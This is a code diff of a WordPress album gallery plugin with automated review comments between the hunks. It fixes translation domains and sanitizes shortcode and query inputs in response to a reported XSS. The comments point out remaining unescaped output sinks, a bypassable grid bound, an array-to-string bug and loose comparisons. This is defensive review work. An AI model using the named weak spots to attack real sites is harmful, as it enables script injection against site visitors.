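Review bot: the text-domain correction from `'sp-news-and-widget'` to `'album-and-image-gallery-plus-lightbox'` is right, but while touching `'item_link_description'` the string `'A link to a album.'` should read `'A link to an album.'`; it is user-visible and fixing it now avoids a second round of translation-string churn.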
@@ -112,21 +112,26 @@

 	$messages[AIGPL_POST_TYPE] = array(
 		0 => '', // Unused. Messages start at index 1.
-		1 => sprintf( __( 'Album Gallery updated.', 'album-and-image-gallery-plus-lightbox' ) ),
+		1 => __( 'Album Gallery updated.', 'album-and-image-gallery-plus-lightbox' ),
 		2 => __( 'Custom field updated.', 'album-and-image-gallery-plus-lightbox' ),
 		3 => __( 'Custom field deleted.', 'album-and-image-gallery-plus-lightbox' ),
 		4 => __( 'Album Gallery updated.', 'album-and-image-gallery-plus-lightbox' ),
+
+		/* translators: %s is the date/time of the revision being restored */
 		5 => isset( $_GET['revision'] ) ? sprintf( __( 'Album Gallery restored to revision from %s', 'album-and-image-gallery-plus-lightbox' ), wp_post_revision_title( (int) $_GET['revision'], false ) ) : false,
-		6 => sprintf( __( 'Album Gallery published.', 'album-and-image-gallery-plus-lightbox' ) ),
+
+		6 => __( 'Album Gallery published.', 'album-and-image-gallery-plus-lightbox' ),
 		7 => __( 'Album Gallery saved.', 'album-and-image-gallery-plus-lightbox' ),
-		8 => sprintf( __( 'Album Gallery submitted.', 'album-and-image-gallery-plus-lightbox' ) ),
+		8 => __( 'Album Gallery submitted.', 'album-and-image-gallery-plus-lightbox' ),
+
+		/* translators: %1$s is the scheduled date and time of the post */
 		9 => sprintf( __( 'Album Gallery scheduled for: <strong>%1$s</strong>.', 'album-and-image-gallery-plus-lightbox' ),
 		  date_i18n( __( 'M j, Y @ G:i', 'album-and-image-gallery-plus-lightbox' ), strtotime( $post->post_date ) ) ),
-		10 => sprintf( __( 'Album Gallery draft updated.', 'album-and-image-gallery-plus-lightbox' ) ),
+
+		10 => __( 'Album Gallery draft updated.', 'album-and-image-gallery-plus-lightbox' ),
 	);

 	return $messages;
 }
-
 // Filter to update slider post message
 add_filter( 'post_updated_messages', 'aigpl_post_updated_messages' );
 No newline at end of file
--- a/album-and-image-gallery-plus-lightbox/includes/class-aigpl-script.php
+++ b/album-and-image-gallery-plus-lightbox/includes/class-aigpl-script.php
@@ -120,11 +120,14 @@

 		// Registring public script
 		wp_register_script( 'aigpl-public-js', AIGPL_URL.'assets/js/aigpl-public.js', array('jquery'), AIGPL_VERSION, true );
+
+		/* translators: %curr% is the current image number, %total% is the total number of images */
+		$mfp_img_counter = esc_js( __( '%curr% of %total%', 'album-and-image-gallery-plus-lightbox' ) );
 		wp_localize_script( 'aigpl-public-js', 'Aigpl', array(
 															'elementor_preview'	=> $elementor_preview,
 															'is_mobile'			=> (wp_is_mobile())	? 1 : 0,
 															'is_rtl'			=> (is_rtl())		? 1 : 0,
-															'mfp_img_counter'	=> esc_js( __( '%curr% of %total%', 'album-and-image-gallery-plus-lightbox' ) ),
+															'mfp_img_counter'	=> $mfp_img_counter,
 															'is_avada'			=> (class_exists( 'FusionBuilder' ))	? 1 : 0,
 														));

--- a/album-and-image-gallery-plus-lightbox/includes/shortcode/aigpl-gallery-album-slider.php
+++ b/album-and-image-gallery-plus-lightbox/includes/shortcode/aigpl-gallery-album-slider.php
@@ -21,12 +21,12 @@
 	global $post;

 	// SiteOrigin Page Builder Gutenberg Block Tweak - Do not Display Preview
-	if( isset( $_POST['action'] ) && ($_POST['action'] == 'so_panels_layout_block_preview' || $_POST['action'] == 'so_panels_builder_content_json') ) {
+	if ( isset( $_POST['action'] ) && ($_POST['action'] == 'so_panels_layout_block_preview' || $_POST['action'] == 'so_panels_builder_content_json') ) {
 		return "[aigpl-gallery-album-slider]";
 	}

 	// Divi Frontend Builder - Do not Display Preview
-	if( function_exists( 'et_core_is_fb_enabled' ) && isset( $_POST['is_fb_preview'] ) && isset( $_POST['shortcode'] ) ) {
+	if ( function_exists( 'et_core_is_fb_enabled' ) && isset( $_POST['is_fb_preview'] ) && isset( $_POST['shortcode'] ) ) {
 		return '<div class="aigpl-builder-shrt-prev">
 					<div class="aigpl-builder-shrt-title"><span>'.esc_html__('Album Slider View', 'album-and-image-gallery-plus-lightbox').'</span></div>
 					aigpl-gallery-album-slider
@@ -34,7 +34,7 @@
 	}

 	// Fusion Builder Live Editor - Do not Display Preview
-	if( class_exists( 'FusionBuilder' ) && (( isset( $_GET['builder'] ) && $_GET['builder'] == 'true' ) || ( isset( $_POST['action'] ) && $_POST['action'] == 'get_shortcode_render' )) ) {
+	if ( class_exists( 'FusionBuilder' ) && (( isset( $_GET['builder'] ) && $_GET['builder'] == 'true' ) || ( isset( $_POST['action'] ) && $_POST['action'] == 'get_shortcode_render' )) ) {
 		return '<div class="aigpl-builder-shrt-prev">
 					<div class="aigpl-builder-shrt-title"><span>'.esc_html__('Gallery Grid View', 'album-and-image-gallery-plus-lightbox').'</span></div>
 					aigpl-gallery-album-slider
@@ -43,47 +43,47 @@

 	// Shortcode Parameter
 	extract(shortcode_atts(array(
-				'limit'						=> 15,
-				'album_design'				=> 'design-1',
-				'album_link_target'			=> 'self',
-				'album_height'				=> '',
-				'album_title'				=> 'false',
-				'album_description'			=> 'false',
-				'album_full_content'		=> 'false',
-				'words_limit'				=> 40,
-				'content_tail'				=> '...',
-				'id'						=> array(),
-				'category'					=> '',
-				'total_photo'				=> '{total}'.' '.__('Photos','album-and-image-gallery-plus-lightbox'),
-				'popup'						=> 'true',
-				'grid'						=> 3,
-				'gallery_height'			=> '',
-				'design'					=> 'design-1',
-				'show_caption'				=> 'true',
-				'show_title'				=> 'false',
-				'show_description'			=> 'false',
-				'link_target'				=> 'self',
-				'image_size'				=> 'full',
-
-				'album_slidestoshow'		=> 3,
-				'album_slidestoscroll'		=> 1,
-				'album_dots'				=> 'true',
-				'album_arrows'				=> 'true',
-				'album_autoplay'			=> 'true',
-				'album_autoplay_interval'	=> 3000,
-				'album_speed'				=> 300,
-				'loop'						=> 'true',
-				'lazyload'					=> '',
-				'extra_class'				=> '',
-				'className'					=> '',
-				'align'						=> '',
+		'limit'						=> 15,
+		'album_design'				=> 'design-1',
+		'album_link_target'			=> 'self',
+		'album_height'				=> '',
+		'album_title'				=> 'false',
+		'album_description'			=> 'false',
+		'album_full_content'		=> 'false',
+		'words_limit'				=> 40,
+		'content_tail'				=> '...',
+		'id'						=> array(),
+		'category'					=> '',
+		'total_photo'				=> '{total}'.' '.__('Photos','album-and-image-gallery-plus-lightbox'),
+		'popup'						=> 'true',
+		'grid'						=> 3,
+		'gallery_height'			=> '',
+		'design'					=> 'design-1',
+		'show_caption'				=> 'true',
+		'show_title'				=> 'false',
+		'show_description'			=> 'false',
+		'link_target'				=> 'self',
+		'image_size'				=> 'full',
+
+		'album_slidestoshow'		=> 3,
+		'album_slidestoscroll'		=> 1,
+		'album_dots'				=> 'true',
+		'album_arrows'				=> 'true',
+		'album_autoplay'			=> 'true',
+		'album_autoplay_interval'	=> 3000,
+		'album_speed'				=> 300,
+		'loop'						=> 'true',
+		'lazyload'					=> '',
+		'extra_class'				=> '',
+		'className'					=> '',
+		'align'						=> '',
 	), $atts, 'aigpl-gallery-album-slider' ));

 	$album_designs		= aigpl_album_designs();
 	$unique_album_no	= aigpl_unique_num();
-	$content_tail		= html_entity_decode( $content_tail );
-	$limit				= ! empty( $limit )						? $limit 							: 15;
-	$post_ids			= ! empty( $id )						? explode(',', $id) 				: array();
+	$content_tail		= sanitize_text_field( $content_tail );
+	$limit				= ! empty( $limit )						? absint($limit) 							: 15;
+	$post_ids			= ! empty( $id )						? array_map( 'absint', explode( ',', $id ) )	: array();
 	$album_design		= ( $album_design && ( array_key_exists( trim( $album_design ), $album_designs ))) ? trim( $album_design ) : 'design-1';
 	$album_link_target	= ( $album_link_target == 'blank' )		? '_blank' 							: '_self';
 	$album_title		= ( $album_title == 'true' )			? 1									: 0;
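Review bot: `$content_tail = sanitize_text_field( $content_tail );` is the fix for the reported XSS and is correct as input sanitization, but it should be paired with escaping at the sink (`esc_html( $content_tail )` wherever it is echoed), since `sanitize_text_field()` strips and trims rather than escaping and does not cover every output context. Two smaller points: `$limit = ! empty( $limit ) ? absint($limit) : 15;` yields `0` for a non-numeric attribute value, which is then passed on instead of the 15 fallback, so use `max( 1, absint( $limit ) )` or fall back when `absint()` returns 0; and the root enabler is still `extract(shortcode_atts(array(...)))`, which turns every attribute into a local variable so each new attribute needs its own sanitization line, so reading from the returned array with per-key sanitization would be safer. The `array_map( 'absint', explode( ',', $id ) )` on `$post_ids` is a good change.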
@@ -106,7 +106,7 @@
 	$align				= ! empty( $align )						? 'align'.$align					: '';
 	$extra_class		= $extra_class .' '. $align .' '. $className;
 	$extra_class		= aigpl_sanitize_html_classes( $extra_class );
-	$album_ses			= ! empty( $_GET['album_ses'] ) ? $_GET['album_ses'] : '';
+	$album_ses			= ! empty( $_GET['album_ses'] ) ? sanitize_text_field( $_GET['album_ses'] ) : '';

 	// If album id passed and album_ses match to passed number
 	$aigpl_album_id 	= ! empty( $_GET['album'] )	? aigpl_clean_number( $_GET['album'], '', 'number' )	: '';
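Review bot: `sanitize_text_field( $_GET['album_ses'] )` is the wrong tool for a value that is only ever compared against `$unique_album_no` (see `if ( $album_ses != $unique_album_no )` in the hunk below): it still lets arbitrary text through, and the loose `!=` between a string and an integer behaves differently on PHP 7 and PHP 8 for input such as `12abc`. Treat it like `$_GET['album']` on the last line of this hunk, which goes through `aigpl_clean_number()`: `$album_ses = ! empty( $_GET['album_ses'] ) ? absint( $_GET['album_ses'] ) : 0;` and compare integers with `!==`.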
@@ -137,7 +137,7 @@
 	$slider_conf = compact( 'slidestoshow', 'slidestoscroll', 'dots', 'arrows', 'autoplay', 'autoplay_interval', 'speed', 'loop', 'lazyload' );

 	// If album id is not passed then take all albums else album images
-	if( $album_ses != $unique_album_no ) {
+	if ( $album_ses != $unique_album_no ) {

 		// WP Query Parameters
 		$args = array (
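Review bot: this hunk changes whitespace only (`if(` to `if (`), as do the `$prefix . 'gallery_imgs'`, `if ( ! empty( $category ))`, `if ( $design_file )` and builder-preview hunks that follow in both shortcode files. Interleaving them with the `sanitize_text_field()` fix makes the security-relevant change harder to spot in review and to backport; split the formatting into its own commit.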
@@ -153,13 +153,13 @@
 		// Meta Query
 		$args['meta_query'] = array(
 								array(
-									'key'		=> $prefix.'gallery_imgs',
+									'key'		=> $prefix . 'gallery_imgs',
 									'value'		=> '',
 									'compare'	=> '!=',
 								));

 		// Category Parameter
-		if( ! empty( $category )) {
+		if ( ! empty( $category )) {

 			$args['tax_query'] = array(
 									array(
@@ -176,20 +176,20 @@
 	ob_start();

 	// If post is there
-	if( ( $album_ses != $unique_album_no ) && $aigpl_query->have_posts() ) { ?>
+	if ( ( $album_ses != $unique_album_no ) && $aigpl_query->have_posts() ) { ?>

 	<div class="aigpl-gallery-slider-wrp <?php echo esc_attr( $extra_class ); ?>">
 		<div class="aigpl-gallery-album-wrp aigpl-gallery-slider aigpl-gallery-album-slider aigpl-clearfix aigpl-album-<?php echo esc_attr( $album_design ); ?>" id="aigpl-gallery-<?php echo esc_attr( $unique ); ?>">
 			<?php while ( $aigpl_query->have_posts() ) : $aigpl_query->the_post();

-					$album_image		= add_query_arg( array( 'album' => $post->ID, 'album_ses' => $unique_album_no), $album_page )."#aigpl-album-gallery-".$unique_album_no;
+					$album_image		= add_query_arg( array( 'album' => $post->ID, 'album_ses' => $unique_album_no), $album_page ) . "#aigpl-album-gallery-" . $unique_album_no;
 					$image_link			= aigpl_get_image_src( get_post_thumbnail_id( $post->ID ), $image_size, true );
-					$total_photo_no		= get_post_meta( $post->ID, $prefix.'gallery_imgs', true );
+					$total_photo_no		= get_post_meta( $post->ID, $prefix .'gallery_imgs', true );
 					$total_photo_no		= ! empty( $total_photo_no ) ? count( $total_photo_no ) : '';
 					$total_photo_lbl	= str_replace('{total}', $total_photo_no, $total_photo);

 					// Include shortcode html file
-					if( $design_file ) {
+					if ( $design_file ) {
 						include( $design_file );
 					}

@@ -202,11 +202,11 @@
 	<?php
 		wp_reset_postdata(); // Reset WP Query

-	} elseif( ! empty( $aigpl_album_id ) && ( $album_ses == $unique_album_no ) ) { // If album id is passed
+	} elseif ( ! empty( $aigpl_album_id ) && ( $album_ses == $unique_album_no ) ) { // If album id is passed

-			echo "<div class='aigpl-breadcrumb-wrp' id='aigpl-album-gallery-{$unique_album_no}'><a class='aigpl-breadcrumb' href='{$album_page}'>".esc_html__('Main Album', 'album-and-image-gallery-plus-lightbox')."</a> » ".get_the_title($post_ids)."</div>";
+		echo "<div class='aigpl-breadcrumb-wrp' id='aigpl-album-gallery-{$unique_album_no}'><a class='aigpl-breadcrumb' href='{$album_page}'>" . esc_html__('Main Album', 'album-and-image-gallery-plus-lightbox') . "</a> » " . get_the_title($post_ids) . "</div>";

-			echo do_shortcode( '[aigpl-gallery id="'.$post_ids.'" grid="'.$grid.'" show_caption="'.$show_caption.'" gallery_height="'.$gallery_height.'" show_title="'.$show_title.'" show_description="'.$show_description.'" popup="'.$popup.'" link_target="'.$link_target.'" design="'.$design.'" image_size="'.$image_size.'"]' );
+		echo do_shortcode( '[aigpl-gallery id="' . $post_ids . '" grid="' . $grid . '" show_caption="' . $show_caption . '" gallery_height="' . $gallery_height . '" show_title="' . $show_title . '" show_description="' . $show_description . '" popup="' . $popup . '" link_target="' . $link_target . '" design="' . $design . '" image_size="' . $image_size . '"]' );

 	} // end else

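Review bot: `get_the_title($post_ids)` and `id="' . $post_ids . '"` in this branch consume `$post_ids`, which the first hunk now builds as an array (`array_map( 'absint', explode( ',', $id ) )`); unless it is reassigned in the lines not shown, `get_the_title()` receives an array and the concatenation yields the literal string `Array`. Whatever value ends up here, escape it and its neighbours at output: `esc_url( $album_page )` inside the `href`, `esc_html()` around the title, and `esc_attr()` around every value interpolated into the nested `[aigpl-gallery ...]` string, since `$grid`, `$gallery_height`, `$show_caption` and the rest arrive straight from the outer shortcode's attributes. Calling the gallery shortcode callback with an attribute array instead of rebuilding a shortcode string would remove that attribute-quoting problem entirely.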
--- a/album-and-image-gallery-plus-lightbox/includes/shortcode/aigpl-gallery-album.php
+++ b/album-and-image-gallery-plus-lightbox/includes/shortcode/aigpl-gallery-album.php
@@ -21,22 +21,22 @@
 	global $post;

 	// SiteOrigin Page Builder Gutenberg Block Tweak - Do not Display Preview
-	if( isset( $_POST['action'] ) && ($_POST['action'] == 'so_panels_layout_block_preview' || $_POST['action'] == 'so_panels_builder_content_json') ) {
+	if ( isset( $_POST['action'] ) && ($_POST['action'] == 'so_panels_layout_block_preview' || $_POST['action'] == 'so_panels_builder_content_json') ) {
 		return "[aigpl-gallery-album]";
 	}

 	// Divi Frontend Builder - Do not Display Preview
-	if( function_exists( 'et_core_is_fb_enabled' ) && isset( $_POST['is_fb_preview'] ) && isset( $_POST['shortcode'] ) ) {
+	if ( function_exists( 'et_core_is_fb_enabled' ) && isset( $_POST['is_fb_preview'] ) && isset( $_POST['shortcode'] ) ) {
 		return '<div class="aigpl-builder-shrt-prev">
-					<div class="aigpl-builder-shrt-title"><span>'.esc_html__('Album Grid View', 'album-and-image-gallery-plus-lightbox').'</span></div>
+					<div class="aigpl-builder-shrt-title"><span>' . esc_html__('Album Grid View', 'album-and-image-gallery-plus-lightbox') . '</span></div>
 					aigpl-gallery-album
 				</div>';
 	}

 	// Fusion Builder Live Editor - Do not Display Preview
-	if( class_exists( 'FusionBuilder' ) && (( isset( $_GET['builder'] ) && $_GET['builder'] == 'true' ) || ( isset( $_POST['action'] ) && $_POST['action'] == 'get_shortcode_render' )) ) {
+	if ( class_exists( 'FusionBuilder' ) && (( isset( $_GET['builder'] ) && $_GET['builder'] == 'true' ) || ( isset( $_POST['action'] ) && $_POST['action'] == 'get_shortcode_render' )) ) {
 		return '<div class="aigpl-builder-shrt-prev">
-					<div class="aigpl-builder-shrt-title"><span>'.esc_html__('Gallery Grid View', 'album-and-image-gallery-plus-lightbox').'</span></div>
+					<div class="aigpl-builder-shrt-title"><span>' . esc_html__('Gallery Grid View', 'album-and-image-gallery-plus-lightbox') . '</span></div>
 					aigpl-gallery-album
 				</div>';
 	}
@@ -72,10 +72,10 @@

 	$album_designs		= aigpl_album_designs();
 	$unique_album_no	= aigpl_unique_num();
-	$content_tail		= html_entity_decode( $content_tail );
-	$limit				= ! empty( $limit )						? $limit							: 15;
-	$post_ids			= ! empty( $id )						? explode( ',', $id )				: array();
-	$album_grid			= ( ! empty( $album_grid ) && $album_grid <= 12 )	? $album_grid			: 3;
+	$content_tail		= sanitize_text_field( $content_tail );
+	$limit				= ! empty( $limit )						? absint($limit)							: 15;
+	$post_ids			= ! empty( $id )						? array_map( 'absint', explode( ',', $id ) )	: array();
+	$album_grid			= ( ! empty( $album_grid ) && $album_grid <= 12 )	? absint($album_grid)			: 3;
 	$album_design		= ( $album_design && ( array_key_exists( trim( $album_design ), $album_designs ))) ? trim( $album_design ) : 'design-1';
 	$album_link_target	= ( $album_link_target == 'blank' )		? '_blank'							: '_self';
 	$album_title		= ( $album_title == 'true' )			? 1									: 0;
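Review bot: the `$album_grid` bound is checked on the raw attribute and `absint()` runs afterwards, so `album_grid="-20"` satisfies `$album_grid <= 12` and then becomes 20, which ends up in `$main_cls` as `aigpl-col-20` (see `"aigpl-cnt-wrp aigpl-col-{$album_grid} aigpl-columns"` in the next hunk). Validate the integer, not the string: `$album_grid = absint( $album_grid ); $album_grid = ( $album_grid >= 1 && $album_grid <= 12 ) ? $album_grid : 3;`. As in the slider shortcode, `sanitize_text_field( $content_tail )` strips tags but keeps quotes, so the template that prints `$content_tail` still needs `esc_html()`/`esc_attr()` at the point of output, and `absint( $limit )` maps non-numeric input to 0 rather than to the 15 default.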
@@ -89,7 +89,7 @@
 	$extra_class		= $extra_class .' '. $align .' '. $className;
 	$extra_class		= aigpl_sanitize_html_classes( $extra_class );
 	$lazyload			= '';
-	$album_ses			= ! empty( $_GET['album_ses'] )	? $_GET['album_ses']	: '';
+	$album_ses			= ! empty( $_GET['album_ses'] )	? sanitize_text_field( $_GET['album_ses'] )	: '';

 	// If album id passed and album_ses match to passed number
 	$aigpl_album_id 	= ! empty( $_GET['album'] )	? aigpl_clean_number( $_GET['album'], '', 'number' )	: '';
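Review bot: `$album_ses` is only compared with `!=` against `$unique_album_no`, so `absint()` or `aigpl_clean_number()` (already used for `$_GET['album']` on the last line of this hunk) plus a strict integer comparison is the tighter choice; `sanitize_text_field()` still lets arbitrary text through and leaves a string-versus-integer loose comparison in place.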
@@ -110,7 +110,7 @@
 	$main_cls	= "aigpl-cnt-wrp aigpl-col-{$album_grid} aigpl-columns";

 	// If album id is not passed then take all albums else album images
-	if( $album_ses != $unique_album_no ) {
+	if ( $album_ses != $unique_album_no ) {

 		// WP Query Parameters
 		$args = array (
@@ -126,13 +126,13 @@
 		// Meta Query
 		$args['meta_query'] = array(
 								array(
-									'key'		=> $prefix.'gallery_imgs',
+									'key'		=> $prefix . 'gallery_imgs',
 									'value'		=> '',
 									'compare'	=> '!=',
 								));

 		// Category Parameter
-		if( ! empty( $category ) ) {
+		if ( ! empty( $category ) ) {
 			$args['tax_query'] = array(
 									array(
 										'taxonomy'	=> AIGPL_CAT,
@@ -155,22 +155,22 @@

 		<?php while ( $aigpl_query->have_posts() ) : $aigpl_query->the_post();

-				$wrpper_cls			= ( $loop_count == 1 ) ? $main_cls.' aigpl-first' : $main_cls;
-				$album_image		= add_query_arg( array( 'album' => $post->ID, 'album_ses' => $unique_album_no), $album_page )."#aigpl-album-gallery-".$unique_album_no;
+				$wrpper_cls			= ( $loop_count == 1 ) ? $main_cls . ' aigpl-first' : $main_cls;
+				$album_image		= add_query_arg( array( 'album' => $post->ID, 'album_ses' => $unique_album_no), $album_page ) . "#aigpl-album-gallery-" . $unique_album_no;
 				$image_link			= aigpl_get_image_src( get_post_thumbnail_id( $post->ID ), $image_size, true );
 				$total_photo_no		= get_post_meta( $post->ID, $prefix.'gallery_imgs', true );
 				$total_photo_no		= ! empty( $total_photo_no ) ? count( $total_photo_no ) : '';
 				$total_photo_lbl	= str_replace( '{total}', $total_photo_no, $total_photo );

 				// Include shortcode html file
-				if( $design_file ) {
+				if ( $design_file ) {
 					include( $design_file );
 				}

 				$loop_count++; // Increment loop count

 				// Reset loop count
-				if( $loop_count == $album_grid ) {
+				if ( $loop_count == $album_grid ) {
 					$loop_count = 0;
 				}
 		endwhile; ?>
@@ -180,11 +180,11 @@
 	<?php
 		wp_reset_postdata(); // Reset WP Query

-	} elseif( ! empty( $aigpl_album_id ) && ( $album_ses == $unique_album_no ) ) { // If album id is passed
+	} elseif ( ! empty( $aigpl_album_id ) && ( $album_ses == $unique_album_no ) ) { // If album id is passed

-			echo "<div class='aigpl-breadcrumb-wrp' id='aigpl-album-gallery-{$unique_album_no}'><a class='aigpl-breadcrumb' href='{$album_page}'>".esc_html__('Main Album', 'album-and-image-gallery-plus-lightbox')."</a> » ".get_the_title($post_ids)."</div>";
+			echo "<div class='aigpl-breadcrumb-wrp' id='aigpl-album-gallery-{$unique_album_no}'><a class='aigpl-breadcrumb' href='{$album_page}'>" . esc_html__('Main Album', 'album-and-image-gallery-plus-lightbox') . "</a> » " . get_the_title($post_ids) . "</div>";

-			echo do_shortcode( '[aigpl-gallery id="'.$post_ids.'" grid="'.$grid.'" gallery_height="'.$gallery_height.'" show_caption="'.$show_caption.'" show_title="'.$show_title.'" show_description="'.$show_description.'" popup="'.$popup.'" link_target="'.$link_target.'" design="'.$design.'" image_size="'.$image_size.'"]' );
+			echo do_shortcode( '[aigpl-gallery id="' . $post_ids . '" grid="' . $grid . '" gallery_height="' . $gallery_height . '" show_caption="' . $show_caption . '" show_title="' . $show_title . '" show_description="' . $show_description . '" popup="' . $popup . '" link_target="' . $link_target . '" design="' . $design . '" image_size="' . $image_size . '"]' );

 	} // end else

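Review bot: same problem as the slider copy of this block: `$post_ids` is an array after `array_map( 'absint', ... )` in the hunk above, yet it is handed to `get_the_title()` and concatenated into `id="..."` unless reassigned in code not shown; `{$album_page}` lands in an `href` without `esc_url()` and the title is echoed without `esc_html()`. Two near-identical copies of the breadcrumb and nested-shortcode rendering argue for one shared helper so that the escaping fix lands in a single place.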
--- a/album-and-image-gallery-plus-lightbox/wpos-analytics/wpos-analytics.php
+++ b/album-and-image-gallery-plus-lightbox/wpos-analytics/wpos-analytics.php
@@ -57,7 +57,7 @@
 	 */
 	public function __clone() {
 		// Cloning instances of the class is forbidden.
-		_doing_it_wrong( __FUNCTION__, __( 'Cheatin’ huh?', 'pwpc' ), '1.0' );
+		_doing_it_wrong( __FUNCTION__, __( 'Cheatin’ huh?', 'album-and-image-gallery-plus-lightbox' ), '1.0' );
 	}

 	/**
--- a/album-and-image-gallery-plus-lightbox/wpos-plugins/includes/admin/class-espbw-admin.php
+++ b/album-and-image-gallery-plus-lightbox/wpos-plugins/includes/admin/class-espbw-admin.php
@@ -29,11 +29,11 @@
 		global $wpos_espbw_module;

 		// Loop of menu
-		if( ! empty( $wpos_espbw_module ) ) {
+		if ( ! empty( $wpos_espbw_module ) ) {
 			foreach ($wpos_espbw_module as $module_key => $module_val) {

 				// Dashboard Page
-				add_submenu_page( $module_val['menu'], __('Essential Plugins Bundle By WP OnlineSuport', 'espbw'), '<span style="color:#2ECC71;">'.__('Install Our Popular Plugins', 'espbw').'</span>', 'manage_options', "{$module_val['prefix']}-espbw-dashboard", array($this, 'espbw_dashboard_page'), $module_val['position'] );
+				add_submenu_page( $module_val['menu'], __('Essential Plugins Bundle By EssentialPlugin', 'album-and-image-gallery-plus-lightbox'), '<span style="color:#2ECC71;">' . __('Install Our Popular Plugins', 'album-and-image-gallery-plus-lightbox') . '</span>', 'manage_options', "{$module_val['prefix']}-espbw-dashboard", array($this, 'espbw_dashboard_page'), $module_val['position'] );
 			}
 		}
 	}
--- a/album-and-image-gallery-plus-lightbox/wpos-plugins/includes/admin/views/dashboard.php
+++ b/album-and-image-gallery-plus-lightbox/wpos-plugins/includes/admin/views/dashboard.php
@@ -39,10 +39,10 @@
 $plugins_filter = wpos_espbw_plugins_filter();

 // Check Plugin Install Permission
-if( ! current_user_can('install_plugins') ) {
+if ( ! current_user_can('install_plugins') ) {
 	echo '<div class="error">
-			<p>'. esc_html__( "Sorry, It looks like that you do not have permission to install the plugin.", "espbw") .'</p>
-			<p>'. esc_html__("You can take a look at our all plugins at", "espbw") .' <a href="https://profiles.wordpress.org/essentialplugin#content-plugins" target="_blank">'. esc_html__("here", "espbw") . '</a>.</p>
+			<p>' . esc_html__( "Sorry, It looks like that you do not have permission to install the plugin.", "album-and-image-gallery-plus-lightbox") . '</p>
+			<p>' . esc_html__("You can take a look at our all plugins at", "album-and-image-gallery-plus-lightbox") . ' <a href="https://profiles.wordpress.org/essentialplugin#content-plugins" target="_blank">' . esc_html__("here", "album-and-image-gallery-plus-lightbox") . '</a>.</p>
 		 </div>';
 	return;
 }
@@ -56,7 +56,7 @@
 		<div class="espbw-dashboard-title">
 			<div class="espbw-dashboard-title-inr">
 				<div class="espbw-dashboard-logo"><img src="<?php echo esc_url( WPOS_ESPBW_URL ); ?>assets/images/essentialplugin-logo.png" alt="essentialplugin" /></div>
-				<h3 style="text-align:center;"><?php esc_html_e( 'Essential Plugin', 'espbw' ); ?></h3>
+				<h3 style="text-align:center;"><?php esc_html_e( 'Essential Plugin', 'album-and-image-gallery-plus-lightbox' ); ?></h3>
 				<em class="wpos-em">Installs directly from <b>wordpress.org</b> repository</em> <br />
 			</div>
 		</div>
@@ -64,15 +64,15 @@

 		<div class="wp-filter espbw-filter">
 			<ul class="filter-links espbw-filter-links">
-				<li class="espbw-plugin-all"><a href="javascript:void(0);" class="espbw-filter-link current"><?php esc_html_e('All Essential Plugins', 'espbw'); ?></a></li>
-				<li class="espbw-plugin-recommended"><a href="javascript:void(0);" class="espbw-filter-link" data-filter="recommended"><?php esc_html_e('Utility Plugins', 'espbw'); ?></a></li>
-				<li class="espbw-plugin-sliders"><a href="javascript:void(0);" class="espbw-filter-link" data-filter="sliders"><?php esc_html_e('Sliders', 'espbw'); ?></a></li>
-				<li class="espbw-plugin-woo"><a href="javascript:void(0);" class="espbw-filter-link" data-filter="woocommerce"><?php esc_html_e('WooCommerce', 'espbw'); ?></a></li>
+				<li class="espbw-plugin-all"><a href="javascript:void(0);" class="espbw-filter-link current"><?php esc_html_e('All Essential Plugins', 'album-and-image-gallery-plus-lightbox'); ?></a></li>
+				<li class="espbw-plugin-recommended"><a href="javascript:void(0);" class="espbw-filter-link" data-filter="recommended"><?php esc_html_e('Utility Plugins', 'album-and-image-gallery-plus-lightbox'); ?></a></li>
+				<li class="espbw-plugin-sliders"><a href="javascript:void(0);" class="espbw-filter-link" data-filter="sliders"><?php esc_html_e('Sliders', 'album-and-image-gallery-plus-lightbox'); ?></a></li>
+				<li class="espbw-plugin-woo"><a href="javascript:void(0);" class="espbw-filter-link" data-filter="woocommerce"><?php esc_html_e('WooCommerce', 'album-and-image-gallery-plus-lightbox'); ?></a></li>
 			</ul>

 			<form class="search-form search-plugins" method="get">
 				<input type="hidden" name="page" value="espbw-dashboard" />
-				<input type="search" name="espbw_search" value="" class="wp-filter-search espbw-search-inp espbw-search-inp-js" placeholder="<?php echo esc_html_e('Search Plugins e.g popup', 'espbw'); ?>" />
+				<input type="search" name="espbw_search" value="" class="wp-filter-search espbw-search-inp espbw-search-inp-js" placeholder="<?php echo esc_html_e('Search Plugins e.g popup', 'album-and-image-gallery-plus-lightbox'); ?>" />
 			</form>
 		</div>

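Review bot: `placeholder="<?php echo esc_html_e( ... ); ?>"` echoes the return value of a function that already echoes (`esc_html_e()` returns nothing), and the string is placed in an attribute, so it should read `<?php esc_attr_e( 'Search Plugins e.g popup', 'album-and-image-gallery-plus-lightbox' ); ?>` with no `echo`.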
@@ -90,8 +90,8 @@
 						// Taking some data
 						$title					= wp_kses( $plugin_data['name'], $plugins_allowedtags );
 						$version				= wp_kses( $plugin_data['version'], $plugins_allowedtags );
-						$name					= strip_tags( $title . ' ' . $version );
-						$description			= strip_tags( $plugin_data['short_description'] );
+						$name					= wp_strip_all_tags( $title . ' ' . $version );
+						$description			= wp_strip_all_tags( $plugin_data['short_description'] );
 						$last_updated_timestamp = strtotime( $plugin_data['last_updated'] );
 						$author					= wp_kses( $plugin_data['author'], $plugins_allowedtags );
 						$author					= str_replace( "href=", 'target="_blank" href=', $author );
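Review bot: `str_replace( "href=", 'target="_blank" href=', $author )` adds `target="_blank"` to the kses-filtered author link without `rel="noopener noreferrer"`; add the `rel` attribute in the same replacement or drop the rewrite. The `wp_strip_all_tags()` switch itself is correct: unlike `strip_tags()` it removes `<script>`/`<style>` contents as well as the tags before `$name` is reused in the `esc_attr()` strings below.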
@@ -107,7 +107,7 @@
 						// Author String
 						if ( ! empty( $author ) ) {
 							/* translators: %s: Plugin author. */
-							$author = ' <cite>' . sprintf( __( 'By %s' ), $author ) . '</cite>';
+							$author = ' <cite>' . sprintf( __( 'By %s', 'album-and-image-gallery-plus-lightbox' ), $author ) . '</cite>';
 						}

 						// Plugin Icon
@@ -136,14 +136,14 @@
 												esc_attr( $plugin_data['slug'] ),
 												esc_url( $status['url'] ),
 												/* translators: %s: Plugin name and version. */
-												esc_attr( sprintf( __( 'Install %s now' ), $name ) ),
+												esc_attr( sprintf( __( 'Install %s now', 'album-and-image-gallery-plus-lightbox' ), $name ) ),
 												esc_attr( $name ),
-												__( 'Install Now' )
+												__( 'Install Now', 'album-and-image-gallery-plus-lightbox' )
 											);
 										} else {
 											$action_links[] = sprintf(
 												'<button type="button" class="button button-disabled" disabled="disabled">%s</button>',
-												_x( 'Cannot Install', 'plugin' )
+												_x( 'Cannot Install', 'plugin', 'album-and-image-gallery-plus-lightbox' )
